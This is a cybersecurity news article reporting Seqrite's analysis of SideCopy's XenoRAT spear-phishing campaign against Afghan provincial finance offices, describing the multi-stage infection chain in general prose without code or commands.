A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT. The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats—regional revenue and finance directorates that form the fiscal backbone of the country.
The attack began with a spear-phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto—the dominant language used by Afghan government workers. The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, indicating the attackers had precise knowledge of their targets’ working environment.
Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence. SideCopy operates under the broader Transparent Tribe, also known as APT36, umbrella—a group with a documented history of targeting South Asian government institutions. Seqrite Labs has been tracking this threat cluster for years as part of its global spear-phishing monitoring program.
Once the victim opened the shortcut file, the malware silently used mshta.exe—a legitimate Windows utility—to reach out to a compromised Afghan education domain and pull a remote payload. This technique, known as Living-off-the-Land, involves abusing built-in system tools to avoid triggering security alerts. The malware then decoded obfuscated JavaScript in memory and embedded itself in the Windows Registry, disguising its persistence entry as a Microsoft Edge process.
The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a bulletproof server in Frankfurt, Germany. This command-and-control infrastructure was entirely separate from the delivery domain—a deliberate design to ensure long-term access even if the delivery layer was discovered and shut down.
The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website. That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.
That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory. The shellcode that followed used reflective loading—allocating executable memory and injecting itself without writing the main payload to disk. This fileless approach makes the malware far harder to catch with conventional antivirus scanning.
XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic, allowing attackers to monitor and control the infected system remotely. The malware can capture screenshots, log keystrokes, and exfiltrate sensitive documents, posing a significant threat to the confidentiality and integrity of government operations.
This campaign underscores the persistent threat posed by state-sponsored actors like SideCopy, who continue to refine their tactics to infiltrate critical government infrastructures. Organizations must remain vigilant, employing robust cybersecurity measures and continuous monitoring to detect and mitigate such sophisticated attacks.
Source: Cyber Security News
